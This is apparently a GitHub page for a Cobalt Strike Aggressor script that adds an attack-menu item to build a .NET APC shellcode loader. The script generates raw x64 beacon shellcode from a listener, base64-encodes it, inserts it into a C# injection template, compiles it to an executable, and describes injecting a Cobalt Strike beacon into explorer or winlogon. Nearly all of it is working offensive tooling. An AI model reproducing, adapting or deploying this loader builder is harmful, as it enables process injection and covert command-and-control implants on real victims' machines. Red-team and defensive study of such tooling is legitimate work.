-
Notifications
You must be signed in to change notification settings - Fork 59
/
Copy pathDotNetExecutables.cna
98 lines (87 loc) · 2.85 KB
/
DotNetExecutables.cna
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
#https://www.cobaltstrike.com/aggressor-script/functions.html
#https://github.com/harleyQu1nn/AggressorScripts/blob/master/CertUtilWebDelivery.cna
sub compile {
# Set variables
$file = $1;
$outputformat = $2;
$version = iff($3 eq "true", "net35", "net40");
$outfile = $4;
# Compile
@command = @("bash", script_resource("compilerscript.sh"), script_resource("Compiler/bin/Release/netcoreapp2.1/Compiler.dll"), $file, $outfile, $version, $outputformat);
exec(@command);
# https://github.com/SpiderLabs/SharpCompile/blob/master/SharpCompile.cna
# Workaround to make sure full binary has been received
# Increase sleep if your binary fails to compile from CS
sleep(2000);
$size = -1;
# 15Sec waiting time
$timeout = 15;
while ((!-exists $outfile || $size < 0 || $size < $newsize) && $timeout > 0) {
$size = $newsize;
$newsize = lof($outfile);
sleep(100);
$timeout -= 1;
}
# If compiling failed, return ""
if($timeout <= 0)
{
return "";
}
return $outfile;
}
sub apc_executable {
# Set variables
global('$version $outputformat $file');
local('%options $listener $rawshellcode $shellcode $apc $newapc $handle $apcoutfile');
%options = $3;
$version = iff(%options["dotnet35"] eq "true", "net35", "net40");
$listener = %options["listener"];
$outputformat = %options["output"];
# Generate shellcode and base64 it
$rawshellcode = artifact_payload($listener, "raw", "x64");
$shellcode = base64_encode($rawshellcode);
# Replace junk with shellcode
$handle = openf(script_resource("/executable_templates/UrbanBishop/Program.cs"));
$apc = readb($handle, -1);
closef($handle);
$newapc = strrep($apc, 'REPLACETHISWITHSHELLCODE', $shellcode);
# Write the new .cs file to disk
$apcoutfile = script_resource("/executable_temps/APC.cs");
$handle = openf("> $apcoutfile");
writeb($handle, $newapc);
closef($handle);
# Prompt for save location and compile
prompt_file_save($null, {
loca('$outfile');
$outfile = compile(script_resource("/executable_temps/APC.cs"), $outputformat, $version, $1 );
if($outfile eq "")
{
show_message("Compiling failed");
}
else{
show_message("Compiling successful");
}
});
while (-exists $apcoutfile)
{
sleep(100);
deleteFile($apcoutfile);
}
}
# Create a popup menu
popup attacks {
menu "&Dotnet Executables" {
item "APC Shellcode Loader X64 (S)" {
local('$dialog %defaults');
# Create our dialog
$dialog = dialog("APC Shellcode loader (Stageless)", %defaults, &apc_executable);
dialog_description($dialog, "An APC loader that injects a cobalt strike beacon into explorer/winlogon");
drow_listener_stage($dialog, "listener", "Listener: ");
drow_combobox($dialog, "output", "Output: ", @("exe"));
drow_checkbox($dialog, "dotnet35", "dotnet35: ", "Compile for dotnet35 instead of dotnet40");
dbutton_action($dialog, "Generate");
# Show our dialog
dialog_show($dialog);
}
}
}